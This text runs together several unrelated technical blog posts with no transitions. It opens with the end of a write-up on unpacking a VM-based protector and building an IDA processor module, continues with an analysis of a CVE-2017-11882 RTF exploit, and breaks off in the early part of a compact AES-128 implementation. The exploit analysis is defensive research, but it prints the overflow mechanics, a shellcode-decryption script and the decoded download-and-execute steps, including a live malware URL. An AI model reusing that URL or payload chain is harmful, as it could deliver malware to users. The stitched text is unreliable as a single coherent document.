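        IMAGE_EXPORT_DIRECTORY *exports = (IMAGE_EXPORT_DIRECTORY *)(base +
            nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
        DWORD *names = (DWORD *)(base + exports->AddressOfNames);
        WORD  *ords  = (WORD  *)(base + exports->AddressOfNameOrdinals);
        DWORD *funcs = (DWORD *)(base + exports->AddressOfFunctions);
        DWORD  i;

        for (i = 0; i < exports->NumberOfNames; i++)
            if (hash_name((const char *)(base + names[i])) == hash)
                return (FARPROC)(base + funcs[ords[i]]);
        return NULL;
    }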

The hashes and their locations in the original IAT are retrieved from the jumble of data at the beginning of the packer section in a similar fashion as the assembling of the DLL names. Additionally, the address at which the resolved import belongs in the original IAT entries is also assembled from scattered data.

    ROM:0102621F    xor     r07, r07    ; r07 = hash
    ROM:01026223    mov     r06, r04
    ROM:01026227    add     r06, 12h
    ROM:0102622F    mov     r05, [r06]
    ROM:01026233    and     r05, 0FFh
    ROM:0102623B    or      r07, r05    ; get a single byte of the hash
    ROM:0102623F    ror     r07, 8
    
    ; idiom repeats three times
    
    ROM:010262B3    xor     r08, r08    ; r08 = where to put the resolved import
    ROM:010262B7    mov     r06, r04
    ROM:010262BB    add     r06, 5C7h
    ROM:010262C3    mov     r05, [r06]
    ROM:010262C7    and     r05, 0FFh
    ROM:010262CF    or      r08, r05
    ROM:010262D3    ror     r08, 8
    
    ; idiom repeats three times
    
    ROM:01026347    push    r07
    ROM:0102634A    push    r03         ; point at copied DLL
    ROM:0102634D    vmcall  API__GetProcAddress
    ROM:01026353    add     r08, 1000000h
    ROM:0102635B    mov     [r08], r0A  ; store resolved address back into IAT

The DLL names, hashes, and IAT addresses can all be recovered with no difficulties, and we can ignore the DLLs being copied into dynamically allocated memory. It’s a simple matter to reverse the hashes into API names. Therefore, the entirety of the import information can be reconstructed statically: we can simply mimic what the packer itself does, rebuild the IDTs/IATs with no difficulties, and then point the imports directory pointer in the PE header to our rebuilt structures.

I was anticipating things would be harder than they turned out to be, so I decided to move the FirstThunk lists (into which the original import references were made) instead of keeping them at their original addresses. This turned out to be an unnecessary mistake that complicates some of what follows. I apologize.

In order to rectify this situation, I kept a map from the old IAT addresses into the new IATs that I created.

For example:

    .text:010012A0    __imp__PageSetupDlgW@4 dd 0

    010012A0 -> [Address of new FirstThunk entry for PageSetupDlgW import]

4.4.2 IAT Redirection

The next thing that happens is that the addresses which were resolved in the previous section are inserted into API-obfuscating stubs described in 4.4, and the addresses of these API-obfuscating stub functions are inserted into the IAT atop the import addresses.

    .text:010012A0    ; BOOL __stdcall PageSetupDlgW(LPPAGESETUPDLGW)
    .text:010012A0    __imp__PageSetupDlgW@4 dd 0
    
    TheHyper:01014126    pushf              
    TheHyper:01014127    pusha              
    TheHyper:01014128    call    sub_1014150 ; eventually ends up at next snippet
                                                                           
    TheHyper:0101423A    popa                       
    TheHyper:0101423B    popf                       
    TheHyper:0101423C    jmp     near ptr 0B97002DDh ; patch here + 1 byte
    
    ROM:0103659A    mov     r0B, 10012A0h ; see above:  IAT addr
    ROM:010365A2    mov     r0E, 1014126h ; see above:  beginning of import obfs
    ROM:010365AA    mov     r08, 101423Dh ; see above:  end of import obfs
    ROM:010365B2    mov     r06, [r0B]
    ROM:010365B6    mov     [r0B], r0E    ; replace IAT addr with obfuscated addr
    ROM:010365BA    mov     r03, r08
    ROM:010365BE    dec     r03
    ROM:010365C1    add     r03, 5
    ROM:010365C9    sub     r06, r03
    ROM:010365CD    mov     [r08], r06    ; form relative jump to real import

This makes no difference to the static examiner, and does not require fixups.

4.4.3 Call Instruction Fixup

Next, the CALL instructions which reference the IAT are re-created as relatively-addressed instructions which reference the API-obfuscating stub functions. The instructions in the original binary were 0xFF 0x15 [direct address], the pre-fixup instructions are 0xCC 0x90 0x90 0x90 0x90 0x90, and the new instructions are 0xE8 [relative address] 0x90. As this operation requires one less byte than the original directly-addressed references, a NOP is needed for the remaining byte cavity.

    .text:010019D4    int     3    ; Trap to Debugger
    .text:010019D5    nop
    .text:010019D6    nop
    .text:010019D7    nop
    .text:010019D8    nop
    .text:010019D9    nop
    
    ROM:0103C747    mov     r03, 10019D4h ; address of the snippet above
    ROM:0103C74F    mov     r06, r03
    ROM:0103C753    add     r06, 5        ; point after call
    ROM:0103C75B    mov     [r03b], 0E8h  ; insert relative call
    ROM:0103C760    inc     r03
    ROM:0103C763    mov     r04, 100121Ch ; where we call to
    ROM:0103C76B    sub     r04, r06      ; create relative displacement
    ROM:0103C76F    mov     [r03], r04    ; insert relative address
    ROM:0103C773    add     r03, 4
    ROM:0103C77B    mov     [r03b], 90h   ; insert NOP in empty byte spot

As before, the idiom is slightly different for fixing the calls in stolen functions, in that r03 is fetched from memory instead of referenced directly. The code at -747 would become, for instance:

    ROM:0103C67E    getmem  r03, 10000h
    ROM:0103C684    mov     r03, [r03]
    ROM:0103C688    add     r03, 1318h

In order to fix these up, we retrieve the address of the call from -747, and the import destination from -763. We then manually insert the correct instruction which calls into this IAT slot. Actually, due to my previously-described mistake, we first run the IAT address through the old IAT slot -> new IAT slot map before fixing the instruction.
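In other words, the unpacker's job at each such site is just to put the original six-byte form back. Here is a sketch, reusing the hypothetical va_to_offset() helper from earlier; call_va is the address of the 0xCC byte above and iat_va is the (remapped) IAT slot recovered from -763.

    #include <string.h>

    /* restore "call dword ptr [IAT entry]" (FF 15 imm32) over the 6-byte cavity */
    void restore_iat_call(unsigned char *image, unsigned long call_va, unsigned long iat_va)
    {
        unsigned long off = va_to_offset(image, call_va);

        image[off]     = 0xFF;
        image[off + 1] = 0x15;
        memcpy(image + off + 2, &iat_va, 4);   /* absolute, little-endian IAT address */
    }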

4.4.4 Mov Instruction Fixup

Next, instructions of the form mov reg32, [dword from IAT] are fixed up by the protector in the same fashion as in the previous section. They are relatively addressed to point directly to the obfuscated stubs (whose addresses are fetched out of the IAT), instead of the direct addressing that was present in the original binary. The registers involved in this process are ESI, EDI, EBP, EBX, and EAX.

Stop and think for a second. So far, we’ve made the assumption that all imports are functions, but this is not always true. The MSVC CRT contains references to two imported data items. Trying to run a data import through the import-obfuscating procedure is an incorrect transformation and will always result in a crash. This is an Achilles’ heel of this protection.

The mov-instruction fixup is accomplished in much the same way as the call-instruction fixups. There are several idioms: for stolen functions, for regular functions, for EAX versus the other registers (as the instruction for EAX is five bytes, while the others are six bytes). The EAX-references are assumed to point to data and are fixed up directly instead of relatively.

Once again, extracting this information from the code sequences is not difficult to do statically, and I think I’m starting to develop RSI so I’ll skip the details here.

4.4.5 IAT Zeroing

After all of the references are correctly fixed up, the import addresses in the IAT are no longer needed, and are zeroed. We can ignore this step.

 4.5 The Rest of the Protection

As is usual in unpacking tasks, we must set the original entrypoint field of the PE header to the real entrypoint. We scan the disassembly listing for the instruction ‘stop’ and then statically backtrace to find the value of r0A.

    ROM:01049F05    mov     r0A, 1006AE0h
    ROM:01049F0D    stop

Finally, the NumberOfRVAsAndSizes field of the PE header has been set to -1 in order to confuse OllyDbg, so we should set that back to 0x10, the default. And while we’re at it, reduce the raw and virtual sizes of the last section, reduce the SizeOfImage, and truncate the last section in the executable. The final executable is exactly 1kb larger than the copy of notepad.exe which ships with Windows XP SP2.
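A sketch of those final header touch-ups over the raw file image, using the winnt.h structures (the field names are the real ones; truncating the last section is omitted for brevity):

    #include <windows.h>

    void fix_headers(BYTE *image, DWORD oep_rva)   /* oep_rva = 0x6AE0 here */
    {
        IMAGE_NT_HEADERS32 *nt =
            (IMAGE_NT_HEADERS32 *)(image + ((IMAGE_DOS_HEADER *)image)->e_lfanew);

        nt->OptionalHeader.AddressOfEntryPoint = oep_rva;  /* restore the OEP   */
        nt->OptionalHeader.NumberOfRvaAndSizes = 0x10;     /* undo the -1 trick */
        /* SizeOfImage and the last section's sizes would be reduced here as well */
    }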

After making all of the above modifications, the binary runs properly. Success!

 5.0 Comments On The Protection

It took a lot of work to unpack this protector, but ultimately, the static solution was both obvious and straightforward. On the other hand, dynamic dumping of this protector would be difficult, although still feasible.

 5.1 Problems With The Protection

This protection has a few problems in the theoretical sense. For one, it requires disassembling the binary: considering that the IAT is zeroed, _every_ reference to the IAT must be accounted for; if not, the program will simply crash. For example, if a trivial packer which XORed the code section, but left the imports alone, was applied first, all references would be missed and the binary would have no hope of running. This could be assuaged by not zeroing the original IAT (but still applying fixups on those which can be found) so that any non-found references continue to work properly.

Another problem is, of course, that disassembly isn’t perfect, and you could end up with all sorts of bugs if you just blindly replace what you think is a reference to the IAT if it is instead just plain old data, for instance.

Another problem is functions which have merged tails. If a function with a shared exit path is stolen, there are going to be problems.

Another problem, discussed in a previous section, is the assumption that imports will always point to functions and not data. This is a faulty assumption, and will cause many failures.

All of that being said, if one assumes perfect disassembly (which is possible manually via IDA and/or full debugging information) and allows a blacklist of imports which are data, then this is a working protection, one which I expect will be quite potent after a few generations. By no means is this a «fire and forget» packer like UPX, but it can be made to work on a case-by-case basis.

 Appendix A: Anti-Debugging Tricks

There are 53 anti-debug mechanisms and checks in the VM, 49 of which can be broken automatically with either a tiny IDC script patching the bytecode directly, or a small patch to the VM harness. Of the remaining four, there are two which I’ve never heard of before (although I don’t do this type of work often), so they’re worth checking out in the IDB, but I won’t ruin the surprises here. I didn’t look too heavily into those which could be broken automatically, so some of those descriptions in the IDB may be incorrect.

You may notice conditional jump instructions in the IDB which don’t have their jump targets resolved, such as the following:

    ROM:01035E90    cmp     r07, 1
    ROM:01035E98    jz      77026DDFh

At first I figured my processor module was buggy, and that this instruction was supposed to transfer control to a keyed memory region which the processor module had failed to locate. After inspecting the raw bytecode and taking a close look at the relevant VM harness code, it turns out that this instruction moves the VM EIP to the immediate value 0x77026DDF, which will cause a reading access violation or undefined behavior during the next VM cycle, depending upon whether that’s a valid address. Hence, jumps with unresolved targets are anti-debugging tricks. TheHyper confirmed this afterwards in private correspondence.

 Appendix B: IDA Processor Module Construction

The main difference between writing a simple disassembler and writing an IDA processor module is that, instead of printing the disassembly immediately and moving on to the next instruction, information about each individual instruction and operand must be retained for later analysis and display.

For example, according to this VM’s instruction encoding, 0x20 0x?[0-0xf] means «get flags into specified register». Whereas in a trivial disassembler one might write this:

    case 0x20:
        printf("%lx:  getefl %s\n", address, decode_register(next_byte & 0xf));
        return 2; // size of instruction

In an IDA processor module, one must write something like this (in ana.cpp):

    case 0x20:
        cmd.itype    = TH_getefl; // instruction code is TH_getefl; this comes
                                  // from an enumeration
        cmd.Op1.type = o_reg;     // operand 1 is register
        cmd.Op1.reg  = TH_Regnum(4, ua_next_byte() & 0xf); // get register num
        cmd.Op1.dtyp = dt_dword;  // register is dword size
        cmd.Op2.type = o_void;    // operands 2+ do not exist
        length = 2;               // instruction size is 2
        break;

TH_getefl is an element of an enum (ins.hpp), which in turn has a text representation and flags (ins.cpp). The operand information is eventually retrieved and printed (out.cpp):

    case o_reg:
        OutReg( x.reg );
        break;

Clearly, writing an IDA processor module is a significant amount of work compared to writing a simple disassembler, and in the case of small portions of straight-line VM code, the latter approach (via IDC) is preferable. However, in the case of large amounts of VM code with non-trivial control flow structure, the traditional advantages of IDA (cross-reference tracking, comment-ability, ability to name locations, creation and application of structures, and the ability to run scripts and existing plugins) really begin to shine.

 B.1 Logical and Physical Divisions of an IDA Processor Module

It should be noted that, as with all C++ source code, physical divisions are irrelevant as long as all references can be resolved at link-time; however, the layout presented herein is consistent with the processor modules released in the IDA SDK, and also with the included processor module. Coincidentally, this information is laid out in the same order as specified by Ilfak in %idasdk%\readme.txt:

    "  Usually I write a new processor module in the following way:
            - copy the sample module files to a new directory
            - first I edit INS.CPP and INS.HPP files
            - write the analyser ana.cpp
            - then outputter
            - and emulator (you can start with an almost empty emulator)
            - and describe the processor & assembler, write the notify() function"

It should also be noted that I have written only one processor module and am not an expert on the subject. This information presented is correct as far as I am aware, but should not be considered authoritative. When in doubt, consult the processor module sources in the IDA SDK, inquire on the DataRescue forums, ask Ilfak, and buy the SDK support plan as a last resort.

 B.2 Assigning Each Mnemonic a Numeric Code and Textual Representation

The files herein are solely responsible for defining the opcodes used by the processor, their mnemonics specifically, in both numeric and textual forms.

B.2.1 Ins.hpp

This file contains an enum, called «nameNum» by Ilfak, which assigns each opcode to a number. This enum contains a special, unused leading entry ([processor]_null, set to zero), and a trailing entry ([processor]_last) denoting the beginning and the end of the enum.

    enum nameNum 
    {
      TH_null = 0,    // Unknown Operation
      TH_mov,         // Move                
      [...,]          // [more instructions here]
      TH_stop,        // Stop execution, return to x86
      TH_end          // No more instructions
    };

B.2.2 Ins.cpp

This file is the counterpart to the header just described; it contains an array of instruc_t structures, each consisting of a const char * (the mnemonic’s textual representation) and a flags dword. The entries in this array correspond numerically to the values given in the enum. The flags specify the number of operands the instruction uses/changes, whether the instruction is a call/switch jump, and whether to continue disassembling after this instruction is encountered (e.g. return instructions and unconditional jumps do not generally transmit control flow to the following instruction).

    instruc_t Instructions[] = {
      { "",                     0             },  // Unknown Operation
      
      // GROUP 1:  Two-Operand Arithmetic Instructions
      { "mov" ,   CF_USE2 | CF_USE1 | CF_CHG1 },  // Move
      [{...,...},]                                // [more instructions]
      { "stop"   ,                    CF_STOP }   // Stop execution, return to x86
    
    };

 

 B.3 Assigning Each Register a Numeric Code and Textual Representation

B.3.1 Reg.hpp

This file contains an enum, whose real entries begin at 0 (unlike the previously-described enums with a bogus leading entry), consisting of the legal registers supported by the processor. As IDA takes into account the concept of segmentation, you will need to define fake code and data segment registers if your processor does not use them.

    enum TH_regs
    {
        rESPb = 0,
        rESPw,
        rESP,
        [...,]
        r0F,
        rVcs, // fake registers for segmentation
        rVds, // fake
        rEND
    };

B.3.2 [Processor].hpp

This file contains an array of const char *s which maps the elements of the enum described in the previous subsection to their textual representations.

    static char *TH_regnames[] =
    {
        "rESPb",
        "rESPw",
        "rESP",
        [...,]
        "r0F"
    };

 

 B.4 Analyzing an Instruction And Filling IDA’s «cmd» Structure

The main disassembler function in an IDA processor module is called int ana() and lives in ana.cpp. This function takes no parameters, and instead retrieves the relevant bytes to decode via the functions ua_next_byte(), _word(), and _long().

This function, or collection of functions as the case may be, is responsible for:

  • Setting cmd.itype to the correct value from the nameNum enum described in section B.2.1.
  • Setting the fields of cmd.Op[1-6] to describe the types of operands (registers, immediates, addresses, etc.) used by this instruction.
  • Returning the length of the instruction.

An example from the included processor module:

    case 0x1d:
        cmd.itype     = TH_vfree;       // virtualalloc'ed memory free 
        cmd.Op1.type  = o_imm;          // type of operand 1 is immediate
        cmd.Op1.value = ua_next_long(); // value = memory key to free
        cmd.Op1.dtyp  = dt_dword;       // 4-byte memory key
        length = 5;                     // 5 bytes, 1 for opcode, 4 for operand
        break;

The cmd structure ties together the functions described in the next two sections: these functions do not take arguments, and instead retrieve information from the cmd structure in order to perform their duties.

 B.5 Displaying Operands

Out.cpp is responsible for providing two functions, bool outop( op_t & ) and void out(). out() is responsible for outputting the mnemonic and deciding whether to output the operands.

There’s a bit of subtlety here: processors which use conditional execution, for example ARM and the instruction MOVEQ, may have a single nameNum/Instructions entry for an opcode ("MOV"), with the logic for appending "-EQ" to the mnemonic living in out(). I have not encountered this while coding a processor module and cannot speak about it.

One thing to notice about the code below is how gl_comm is set to 1 every time out() is called. If you do not do this, you will not see comments in the disassembly. Figuring this out required an email to Ilfak. Frankly, it’s puzzling why displaying comments is not the default behavior, but this is the reality, so be sure to set this variable.

    void out( void )
    {
        char buf[MAXSTR];
        init_output_buffer(buf, sizeof(buf));
        OutMnem();
        
        if( cmd.Op1.type != o_void )
            out_one_operand( 0 );    // output first operand
        
        if( cmd.Op2.type != o_void ) // do we have a second operand?
        {
            out_symbol( ',' );       // put a ", " in the output
            OutChar( ' ' );
            out_one_operand( 1 );    // output second operand
        }
        
        term_output_buffer();
    
        // attach a possible user-defined comment to this instruction
        gl_comm = 1;
                                              
        MakeLine( buf );
    }

The other function, bool outop(op_t &), is responsible for translating the contents of the op_t structure it is given into a textual description of that operand. The structure of this function is a simple switch statement on the op_t.type field. This function should be written concurrently with ana().

The output takes place through a number of functions exported from ua.hpp in the SDK: these functions tend to begin with «Out» or «out_» (out_register, OutValue, out_keyword, out_symbol, etc).

All in all, coding this function is mainly trivial. Here’s one of the more complicated operand types from the included processor module:

    case o_displ:
        out_symbol('[');
        OutReg( x.phrase );
        out_symbol('+');
        OutValue(x, OOF_ADDR );
        out_symbol(']');
        break;

 

 B.6 Creating Cross-References

Most, but not all, instructions implicitly transfer control flow to the next instruction, and create no other cross-references. Some instructions like «ret» and «jmp» do not reference the next instruction. Other instructions, like «call» and conditional jumps, create additional references to the address(es) targeted. Still other instructions create references to data variables specified by immediate values.

This knowledge is not inherent in the depiction of the instruction set which has been developed thus far, and must be specified programmatically. This is the responsibility of the int emu() function, which resides in emu.cpp, the smallest .cpp file in the supplied processor module.

    int emu( void )
    {
      ulong Feature = cmd.get_canon_feature();
    
      if((Feature & CF_STOP) == 0) // does this instruction pass flow on?
          ua_add_cref( 0, cmd.ea+cmd.size, fl_F ); // yes -- add a regular flow
    
      if(Feature & CF_USE1) // does this instruction have a first operand?
          TouchArg(cmd.Op1, 0); // process it 
    
      if(Feature & CF_USE2)
          TouchArg(cmd.Op2, 1);
    
      return 1; // return value seems to be unimportant
    }
    
    // "emulation" performed on a given op_t, see emu()
    static void TouchArg( op_t &x, bool bRead )
    {
        switch( x.type )
        {
        case o_vmmem:
            ua_add_cref( 0, get_keyed_address(x.addr), 
                         InstrIsSet(cmd.itype, CF_CALL) ? fl_CN : fl_JN);
            // add a code reference to the targeted address, either a call or a 
            // jump depending on whether that instruc_t's flags has CF_CALL set.
            break;
        }
    }

 

 B.7 Declaring IDA’s Relevant Processor Module Structures

The bulk of what remains is the creation of structures which are directly or indirectly exported by the processor module.

B.7.1 asm_t Structure

This structure defines an «assembler» which determines what the disassembly listing should look like. Specifically, what the syntax is for declaring data, origins, section boundaries, comments, strings, etc.

Since we don’t need to re-assemble virtual machine code (in the case of VMs found in protectors), the choices made here are immaterial, and this structure can be created once and re-used for all VM processor modules.

B.7.2 Function Begin and End Sequences

Both of these are optional. IDA employs both a linear-sweep and a flow-following method of disassembly: on the first pass, it marks all entrypoints as code, and then scans the raw bytes looking for the function begin sequences (such as push ebp / mov ebp, esp). These sequences can be specified in the processor module; however, when dealing with a throwaway VM, they aren’t so important, because you’re unlikely to know a priori what a function prologue looks like.

B.7.3 Processor Notification Event Handler

This is where my ignorance of processor module construction is most transparent. This function is called by the kernel upon certain events being triggered; such events include closing the database, opening an existing IDB, creating a new IDB, changing the processor module type, creating a new segment, and so on. A complete list of events can be found in idp.hpp.

For the creation of this processor module, I did not need to utilize many processor events, so I did not explore this further.

B.7.4 processor_t Structure

This is the «main» structure employed by the processor module, as plugin_t is the main structure employed by a plugin. In this structure, the pieces gathered in the previous sections are stitched together.

The processor module must know:

  • The numeric ID of the processor module (custom-defined).
  • The long and short name of the processor module. I.e. metapc and pc respectively. There’s an important point here which isn’t documented: the makefile has a line called «DESCRIPTION» which MUST be in the format «[long name]:[short name]». Failure to ensure this means that the processor module will not be shown in the list of valid processor modules. Without knowing this, you’ll be mailing Ilfak for advice, like I did.
  • The assembler(s) available. We’ll only need the one we defined in B.7.1.
  • A function pointer to int ana() (see B.4).
  • A function pointer to int emu() (see B.6).
  • A function pointer to void out() and bool outop(op_t &) (see B.5).
  • A function pointer to int notify(processor_t::idp_notify, …) (see B.7.3).
  • The number of registers, and a pointer to the const char * array of register names (both laid out in B.3).
  • The function begin and end sequences described in B.7.2. We can set these to NULL.
  • The number of mnemonics, and a pointer to the instruc_t array of mnemonic names (both laid out in B.2).

 

 Appendix C: Obligatory Greets

TheHyper: Very innovative, good work! You keep making them, I’ll keep breaking them.

blorght and Zen: Two of my favorite people, with or without the charming accents. Way too talented and more than a step or two over the edge. Stay just the way you are: I love both of you.

Nicholas Brulez: My bro the PE killer 🙂 I hope we get to meet up again soon. I don’t have to tell you to keep kicking ass, mate.

Neural Noise: One of my best friends, and a very gracious host. I can’t wait to meet up again in the world’s most alluring mafia-run slum that is Napoli (what a crazy city!). You bring the beautiful women, and I’ll bring my bummy self, and we can have panic attacks in traffic waiting for the party to start ;-). Stay cool, man! 🙂

Solar Eclipse: Congrats on the Pietrek thing!

spoonm: Thanks for the crash space and the informed conversation, and I’m looking forward to see what you publish next, too.

Pedram: For being the modern-day Fravia of OpenRCE and editing this tripe.

Rossi: For the much-needed proofreading.

lin0xx: Calm down!

LeetNet, kw, and upb: Self-explanatory.

Skape: For uninformed and for rocking.

Finally, to all true friends everywhere: I couldn’t do it without you.

CVE-2017-11882 RTF — Full description

Two weeks ago a malicious MS Word document was flagged by a sandbox (SHA-256: 1aca3bcf3f303624b8d7bcf7ba7ce284cf06b0ca304782180b6b9b973f4ffdd7). The sample looked interesting because, at that time, VirusTotal had a limited detection rate. Both VirusTotal and Any.Run identified the sample as CVE-2017-11882, one of the infamous Equation Editor exploits. Let’s take a look.

Looking for an OLE

RTF is quite a complex format by itself. On top of that, adversaries add additional obfuscation layers to prevent both analysts and various analysis tools from detecting the malicious objects.

RTF Hide & Seek

Firing up oletools/rtfobj and Didier Stevens’ rtfdump and looking for OLE objects did not turn up anything useful.

rtfdump.py: no OLE objects detected

rtfobj: no OLE objects detected

You can find a list of RTF obfuscation techniques in the links below:

Unfortunately those didn’t help find an OLE object, so we simply searched for “d0cf” (the OLE Compound File header identifier), and one instance came up.

One OLE object instance identified
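Since RTF stores embedded objects as ASCII hex (which is why we grep for the text "d0cf" rather than raw bytes), the manual search can be sketched in a few lines of C; the function name is mine:

// locate the hex-encoded OLE Compound File header ("d0cf11e0...") in an RTF buffer
#include <ctype.h>

long find_ole_hex(const char *buf, long len)
{
    long i;
    for (i = 0; i + 4 <= len; i++)
        if (tolower((unsigned char)buf[i])     == 'd' && buf[i + 1] == '0' &&
            tolower((unsigned char)buf[i + 2]) == 'c' && tolower((unsigned char)buf[i + 3]) == 'f')
            return i;          /* offset of the embedded object's hex data */
    return -1;
}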

Analyzing the OLE

Apparently this OLE object has a CLSID of “0002ce02-0000-0000-c000-000000000046”, which indicates that the OLE object is related to Equation Editor and to the exploit itself. Additionally, one OLE Native Stream was identified (instead of an Equation Native stream).

CLSID related to Equation Editor
OLE CLSID
OLE Native Stream

How is the OLE Native Stream related? Cofense has posted a relevant article:

The OLENativeStream is an OLE2.0 stream object contained within an OLE Compound File Storage (MS-CFB) object and contains only one header field, a 4-byte NativeDataSize field

Return to stack

The native stream is 0x795 (1945) bytes long. After that offset the actual content follows. One can guess that the next 4 bytes, starting with 02 AB 01 E7, are related to the Equation Editor MTEF header (given that no Equation Native stream exists). You can find a good analysis of MTEF here. The header consists of 5 bytes, where the first one should be 0x03. Apparently the MTEF header does not play an important role (or does it?). In addition, there are two extra bytes (0xA, 0x1) which do not map onto the MTEF specification. If anyone knows how to interpret those bytes, please enlighten me.

Shellcode map

The most important part is the font record, which has an ID of 0x8 and two one-byte identifiers, one for the typeface number and one for the style (0x9D and 0x7C respectively). After this byte sequence comes the actual font name. The font name is stored in a buffer of 40 bytes; 8 more bytes are needed in order to overwrite the return address, which in our case is 0x00402157. This address belongs to a ret instruction in EQNEDT32.exe.

It is well known that this specific exploit is a stack-based buffer overflow. Our bet is that after the ret instruction, execution returns to our shellcode. Let’s fire up WinDbg.

Windbg return to stack

Prior to the ret instruction, the last element on the stack is the address of our shellcode (0x0018f354). After the ret, this value is popped into EIP. We can see in the disassembly window that we have a very clean shellcode.

Analyzing the shellcode

In order to analyze the shellcode I used shellcode2exe and fired up IDA. The first call is to 0x004667b0, which is the import address of the GlobalLock function in EQNEDT32.exe; it locks our shellcode in memory.

Following a sequence of jmp instructions, we end up in an XOR decryption loop. The decryption starts at offset 0x3FE and runs for 0x389 bytes. In order to help with the decryption, a small IDAPython script was created (forgive any Python mistakes, Python n00b here). The script can be executed by selecting the desired offset and typing run() in the console line in IDA.

import struct
from ctypes import c_uint

# IDAPython script: decrypt the XORed shellcode in place.
# The key stream is a simple multiply/add generator producing one 32-bit
# value per 4-byte group; Byte() and PatchByte() are IDA API functions.
def run():
    startPos = 0x4013fe                              # start of the encrypted blob
    xored = 0
    for index in range(startPos, startPos + 0x389, 4):
        xored = xored * 0x22A76047
        xored = xored + 0x2698B12D
        for i in range(0, 4):
            patched_byte = ord(struct.pack('<I', c_uint(xored).value)[i]) ^ Byte(index + i)
            PatchByte(index + i, patched_byte)

After the execution of the script, a URL appeared, therefore something good happened to us.

Bytes before and after the decryption

In the decryption loop there is a call to sub_40147e which, before the decryption, was meaningless, as the jmp destination was out of range.

Before the decryption

However, after the decryption the same function is totally different. You can observe a lot of indirect call instructions, and one can bet that they are function pointers resolved by GetProcAddress.

After the decryption

In order not to make the post huge (and being too lazy to continue the static analysis), WinDbg came into the scene. What the shellcode does can be summarized in the following steps:

  • ExpandEnvironmentStringsW(“%APPDATA%\wwindowss.exe”,dst_path)
  • URLDownloadToFileW(“ http://reggiewaller.com/404/ac/ppre.exe”,dst_path)
  • CreateProcessW(“C:\Users\vmuser\AppData\Roaming\wwindowss.exe”)
  • ExitProcess

That’s all folks! This post and any following ones are simply a notepad documenting some basic analysis steps. Any comments or corrections are more than welcome.

In the above we presented an analysis of a malicious RTF flagged by a sandbox. The RTF exploits CVE-2017-11882; we dissected the RTF, extracted the shellcode and analyzed it. The shellcode is a plain download & execute payload.

AES-128 Block Cipher

Introduction

In January 1997, the National Institute of Standards and Technology (NIST) initiated a process to replace the Data Encryption Standard (DES) published in 1977. A draft criteria to evaluate potential algorithms was published, and members of the public were invited to provide feedback. The finalized criteria was published in September 1997 which outlined a minimum acceptable requirement for each submission.

Four years later, in November 2001, Rijndael, designed by the Belgian cryptographers Vincent Rijmen and Joan Daemen and now referred to as the Advanced Encryption Standard (AES), was announced as the winner.

Since publication, implementations of AES have frequently been optimized for speed. Code which executes the quickest has traditionally taken priority over how much ROM it uses. Developers will use lookup tables to accelerate each step of the encryption process, thus compact implementations are rarely if ever sought after.

Our challenge here is to implement AES in the least amount of C and more specifically x86 assembly code. It will obviously result in a slow implementation, and will not be resistant to side-channel analysis, although the latter problem can likely be resolved using conditional move instructions (CMOVcc) if necessary.

AES Parameters

There are three different sets of parameters available, with the main difference being the key length. Our implementation will be AES-128, which fits perfectly onto a 32-bit architecture.

          Key Length    Block Size    Number of Rounds
          (Nk words)    (Nb words)    (Nr)
AES-128        4             4              10
AES-192        6             4              12
AES-256        8             4              14

Structure of AES

Two IF statements are introduced in order to perform the encryption in one loop. What isn’t included in the illustration below is ExpandRoundKey and AddRoundConstant, which generate the round keys.

The first layout here is what we normally see used when describing AES. The second introduces 2 conditional statements which make the code more compact.

Source in C

The optimizers built into C compilers can sometimes reveal more efficient ways to implement a piece of code. At the very least, they will show you alternative ways to write some code in assembly.

#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned char B;
typedef unsigned W;

// Multiplication over GF(2**8)
W M(W x){
    W t=x&0x80808080;
    return((x^t)*2)^((t>>7)*27);
}
// SubByte
B S(B x){
    B i,y,c;
    if(x){
      for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
      x=y;F(4)x^=y=(y<<1)|(y>>7);
    }
    return x^99;
}
void E(B *s){
    W i,w,x[8],c=1,*k=(W*)&x[4];
    
    // copy plain text + master key to x
    F(8)x[i]=((W*)s)[i];
    
    for(;;){
      // 1st part of ExpandRoundKey, AddRoundKey and update state
      w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];
      
      // 2nd part of ExpandRoundKey
      w=R(w,8)^c;F(4)w=k[i]^=w;      
      
      // if round 11, stop else update c
      if(c==108)break;c=M(c);      
      
      // SubBytes and ShiftRows
      F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);
      
      // if not round 10, MixColumns
      if(c!=108)F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
    }
}

x86 Overview

Some x86 registers have special purposes, and it’s important to know this when writing compact code.

Register   Description         Used by
eax        Accumulator         lods, stos, scas, xlat, mul, div
ebx        Base                xlat
ecx        Count               loop, rep (conditional suffixes E/Z and NE/NZ)
edx        Data                cdq, mul, div
esi        Source Index        lods, movs, cmps
edi        Destination Index   stos, movs, scas, cmps
ebp        Base Pointer        enter, leave
esp        Stack Pointer       pushad, popad, push, pop, call, enter, leave

Those of you familiar with the x86 architecture will know certain instructions have dependencies or affect the state of other registers after execution. For example, LODSB will load a byte from the memory pointed to by SI into AL before incrementing SI by 1. STOSB will store the byte in AL to the memory pointed to by DI before incrementing DI by 1. MOVSB will move a byte from the memory pointed to by SI to the memory pointed to by DI, before adding 1 to both SI and DI. If the same instruction is preceded by REP (for repeat), then the CX register is also affected, decreasing by 1 per iteration.

Initialization

The s parameter points to a 32-byte buffer containing a 16-byte plain text and a 16-byte master key, which is copied to the local buffer x.

A copy of the data is required, because both will be modified during the encryption process. ESI will point to s while EDI will point to x.

EAX will hold the Rcon value declared as c. ECX will be used exclusively for loops, and EDX is a spare register for loops which require an index starting position of zero. There’s a reason to prefer EAX over other registers: byte comparisons are only 2 bytes for AL, while 3 bytes for the others.

// 2 vs 3 bytes
  /* 0001 */ "\x3c\x6c"             /* cmp al, 0x6c         */
  /* 0003 */ "\x80\xfb\x6c"         /* cmp bl, 0x6c         */
  /* 0006 */ "\x80\xf9\x6c"         /* cmp cl, 0x6c         */
  /* 0009 */ "\x80\xfa\x6c"         /* cmp dl, 0x6c         */

In addition to this, one operation requires saving EAX in another register, which takes only 1 byte with XCHG. Exchanging two other registers would require 2 bytes.

// 1 vs 2 bytes
  /* 0001 */ "\x92"                 /* xchg edx, eax        */
